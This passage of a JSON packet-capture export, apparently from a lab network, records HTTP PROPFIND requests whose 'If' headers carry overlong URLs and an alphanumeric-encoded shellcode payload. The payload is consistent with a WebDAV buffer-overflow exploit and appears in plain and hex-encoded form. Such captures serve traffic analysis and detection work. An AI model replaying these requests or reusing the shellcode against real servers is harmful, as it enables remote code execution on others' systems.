"http.request.line": "If: <http://192.168.68.1:80/NoWPaQiUuTRChcVbeeRzgOUBFrXhnJQihbxwLTnRXmHRxFqrBVjiiRr<52><72><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/iVNnfKtAdKcdrqvtgKONBKqyqdIHGExcaMlLHIUmlAdbXNwJJotYTPF<50><46><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "698"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.988558000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.988558000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.003176000",
|
||
"frame.time_relative": "17.239498000",
|
||
"frame.number": "705",
|
||
"frame.len": "237",
|
||
"frame.cap_len": "237",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "223",
|
||
"ip.id": "0x0000d158",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00005f59",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "44685",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "44685",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "92",
|
||
"tcp.len": "171",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "868507501",
|
||
"tcp.nxtseq": "1620",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "161124750",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000f516",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:fc:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:fc:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868796",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000322000",
|
||
"tcp.analysis.bytes_in_flight": "1619",
|
||
"tcp.analysis.push_bytes_sent": "1619"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000507000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "704",
|
||
"tcp.segment": "705",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1619",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:66:4b:56:42:76:75:7a:72:74:79:6d:47:7a:4d:4c:7a:54:50:57:45:6d:47:57:59:71:56:6f:75:58:5a:69:4f:4f:45:4b:67:77:71:64:70:53:54:4e:54:52:65:4c:6f:43:4c:54:4f:6e:70:e7:9d:a5:e5:95:b4:e4:89:b6:e4:b1:9a:e4:99:99:e4:99:ac:e5:9d:98:e6:b5:a8:e4:a5:a4:e5:a9:b3:e6:a1:81:e5:a9:b4:e6:9d:82:e6:b5:87:e4:a9:b6:e4:a1:99:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:a5:90:e6:89:a3:e4:91:b0:e4:a5:b6:e5:89:a7:e4:a5:a3:e4:bd:94:e5:85:8d:e4:b1:82:e7:91:b5:e4:9d:8a:e6:99:94:e6:b1:a2:e5:a1:a4:e4:b9:b4:e6:b5:93:e4:95:95:e5:8d:89:e6:b9:8b:e4:99:88:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:66:6a:4d:6a:62:65:6a:4b:63:52:47:44:63:55:73:42:44:6b:44:48:78:46:73:73:6a:47:6a:6c:61:6b:71:4f:78:58:4b:4f:61:61:6a:6a:41:57:6e:48:72:6d:45:59:6d:58:6e:6f:4b:43:e7:89:83:e6:ad:aa:e6:9d:b8:e4:bd:af:e7:85:b8:e6:bd:b4:e7:99:ac:e4:a1:98:e6:a9:b8:e7:9d:a8:e4:8d:b6:e7:85:84:e4:b1:98:e6:8d:b0:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:99:88:e7:89:98:e5:85:ad:e6:85:a4:e1:8f:80:e6:a0:83:e7:8d:ab:e4:8d:b9:e5:a9:87:e5:95:8f:e5:99:a6:e5:85:b1:e4:8d:97:e6:99:b6:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/fKVBvuzrtymGzMLzTPWEmGWYqVouXZiOOEKgwqdpSTNTReLoCLTOnp<6E><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/fjMjbejKcRGDcUsBDkDHxFssjGjlakqOxXKOaajjAWnHrmEYmXnoKC<4B><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoV